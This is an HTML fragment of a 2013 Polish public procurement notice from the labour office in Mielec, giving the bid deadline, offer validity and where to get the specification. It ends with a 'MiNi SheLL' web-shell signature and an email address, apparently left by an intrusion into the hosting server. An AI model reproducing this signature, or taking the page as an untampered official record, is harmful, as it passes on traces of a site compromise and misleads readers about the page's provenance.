<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.pup.mielec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Mielcu, ul. Chopina 16 A, 39-300 Mielec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2013 godzina 13:00, miejsce: Powiatowy Urząd Pracy w Mielcu przy ul. Chopina 16 A, 39-300 Mielec, sekretariat - pokój nr 13 (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com